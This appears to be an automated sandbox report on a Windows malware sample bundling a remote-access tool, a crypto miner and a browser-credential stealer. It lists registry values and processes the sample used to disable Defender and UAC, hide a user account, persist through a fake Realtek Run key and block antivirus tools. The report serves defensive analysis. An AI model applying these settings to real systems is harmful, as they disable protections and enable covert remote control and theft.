rms | b072506b100e143611b6b01f8e4ac35115665771f6f25685d1e5f5426cc7f03b

Resubmissions

19-06-2024 15:51

240619-taf8dashpd 10

19-06-2024 07:13

240619-h2hdzawelb 10

Analysis

max time kernel
150s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
19-06-2024 07:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Size

17.0MB
MD5

bd38e93c22ab359d615e7464fd252363
SHA1

a2100f45c63843df24fc95f0179851399951f9d7
SHA256

b072506b100e143611b6b01f8e4ac35115665771f6f25685d1e5f5426cc7f03b
SHA512

014c37ff5b55569a62db9be82df29102b1cb1e8ced11d25b3aedbf79dff2be9ddd3f577d1781a68b84ae39a62be1d99b156965c17c052315e67f43e0c9486cd1
SSDEEP

393216:iYp4jGXCrXu7RJuDZEIjUYmq1HmcopWtmeUb969RooKtN:HpnXDRAhocm4tLA9eRGN

Score

10^/10

rms aspackv2 defense_evasion discovery evasion execution exploit miner persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/files/0x0008000000023439-137.dat	WebBrowserPassView

Nirsoft 1 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023439-137.dat	Nirsoft

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4848	netsh.exe
3932	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
3052	icacls.exe
4672	icacls.exe
748	icacls.exe
4800	icacls.exe
4620	icacls.exe
1660	icacls.exe
4696	icacls.exe
3440	icacls.exe
4944	icacls.exe
4368	icacls.exe
1204	icacls.exe
4364	icacls.exe
1968	icacls.exe
4980	icacls.exe
1648	icacls.exe
4092	takeown.exe
3544	icacls.exe
1792	icacls.exe
828	icacls.exe
2840	icacls.exe
4360	icacls.exe
4624	icacls.exe
2716	icacls.exe
4880	icacls.exe
1408	icacls.exe
4540	icacls.exe
4648	icacls.exe
3728	icacls.exe
1876	icacls.exe
2328	icacls.exe
3204	icacls.exe
1580	icacls.exe
5116	icacls.exe
2776	icacls.exe
644	icacls.exe
4844	icacls.exe
1728	icacls.exe
368	icacls.exe
3752	icacls.exe
5016	icacls.exe
2400	icacls.exe
2864	icacls.exe
3224	icacls.exe
2000	icacls.exe
3100	icacls.exe
4844	icacls.exe
8	icacls.exe
1968	icacls.exe
2892	icacls.exe
4824	icacls.exe
4360	icacls.exe
4672	icacls.exe
4544	icacls.exe
1988	icacls.exe
880	icacls.exe
2812	icacls.exe
2228	icacls.exe
2424	icacls.exe
4648	icacls.exe
4356	icacls.exe
4784	icacls.exe
2732	icacls.exe
2716	icacls.exe
4804	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2556	attrib.exe
3932	attrib.exe
4628	attrib.exe
1872	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000700000002342e-261.dat	acprotect
behavioral2/files/0x000700000002342d-260.dat	acprotect

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0007000000023429-148.dat	aspack_v212_v242
behavioral2/files/0x0008000000023428-262.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Vegas.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Cheat64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Logs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	winit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Vegas.sfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	MOS.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	P.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	R8.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Executes dropped EXE 31 IoCs

pid	Process
1768	Logs.exe
3160	winit.exe
3180	Cheat.exe
1612	winit.exe
3164	svchost.exe
936	P.exe
2864	P.exe
2980	1.exe
2412	R8.exe
4808	rutserv.exe
908	rutserv.exe
3260	rutserv.exe
2352	winlog.exe
2608	winlogon.exe
1540	rutserv.exe
1948	Vega.exe
1284	rfusclient.exe
5104	rfusclient.exe
1396	Rar.exe
2324	Vegas.sfx.exe
4064	MOS.exe
2424	Vegas.exe
2980	M.exe
4188	Cheat64.exe
3800	RDPWInst.exe
4816	taskhostw.exe
4848	rfusclient.exe
1524	RDPWInst.exe
1984	AppHost.exe
4488	taskhostw.exe
2560	taskhostw.exe

Loads dropped DLL 1 IoCs

pid	Process
4652	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1876	icacls.exe
2716	icacls.exe
4980	icacls.exe
2320	icacls.exe
756	icacls.exe
5116	icacls.exe
5016	icacls.exe
4544	icacls.exe
3268	icacls.exe
4364	icacls.exe
1492	icacls.exe
4880	icacls.exe
2228	icacls.exe
1464	icacls.exe
936	icacls.exe
3180	icacls.exe
4964	icacls.exe
4784	icacls.exe
1304	icacls.exe
3204	icacls.exe
1660	icacls.exe
3776	icacls.exe
1408	icacls.exe
2716	icacls.exe
4800	icacls.exe
3164	icacls.exe
1768	icacls.exe
3932	icacls.exe
4304	icacls.exe
828	icacls.exe
4636	icacls.exe
4420	icacls.exe
2732	icacls.exe
4844	icacls.exe
4648	icacls.exe
3052	icacls.exe
4844	icacls.exe
4616	icacls.exe
4356	icacls.exe
4824	icacls.exe
644	icacls.exe
876	icacls.exe
2168	icacls.exe
4672	icacls.exe
3752	icacls.exe
3100	icacls.exe
1968	icacls.exe
2840	icacls.exe
2348	icacls.exe
880	icacls.exe
988	icacls.exe
4944	icacls.exe
4672	icacls.exe
4360	icacls.exe
1792	icacls.exe
688	icacls.exe
3520	icacls.exe
8	icacls.exe
2556	icacls.exe
4048	icacls.exe
4364	icacls.exe
1648	icacls.exe
1952	icacls.exe
2864	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0009000000023440-206.dat	upx
behavioral2/memory/2608-219-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/files/0x000700000002342e-261.dat	upx
behavioral2/files/0x000700000002342d-260.dat	upx
behavioral2/memory/2608-309-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
18	raw.githubusercontent.com
22	iplogger.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000700000002342b-84.dat	autoit_exe
behavioral2/files/0x0007000000023433-108.dat	autoit_exe
behavioral2/files/0x0007000000023434-265.dat	autoit_exe

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\windows\SysWOW64\hs	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\windows\SysWOW64\hhsm	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\windows\SysWOW64\xmr64	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\windows\SysWOW64\xmr	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

Drops file in Program Files directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Kaspersky Lab	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Cezurity	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\Enigma Software Group	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\SpyHunter	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\AVG	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\Malwarebytes	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\COMODO	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\AVAST Software	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\Cezurity	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\360	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\AVG	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\ESET	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Panda Security	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\windowsnode	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Windows\hhsm	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Windows\min	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Windows\hs_module	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Windows\WindowsDefender	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
File opened for modification	C:\Windows\rss	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

Launches sc.exe 13 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4684	sc.exe
876	sc.exe
2968	sc.exe
2852	sc.exe
4372	sc.exe
3088	sc.exe
680	sc.exe
2036	sc.exe
684	sc.exe
3784	sc.exe
4948	sc.exe
4644	sc.exe
2116	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2068	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 14 IoCs

evasion

pid	Process
4120	timeout.exe
1544	timeout.exe
3520	timeout.exe
4912	timeout.exe
1532	timeout.exe
4336	timeout.exe
368	timeout.exe
1452	timeout.exe
4572	timeout.exe
116	timeout.exe
4948	timeout.exe
856	timeout.exe
4428	timeout.exe
2680	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
832	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
4812	taskkill.exe
4260	taskkill.exe
3964	taskkill.exe
4844	taskkill.exe
4708	taskkill.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	MOS.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	P.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2076	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4360	schtasks.exe
3852	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
2980	1.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
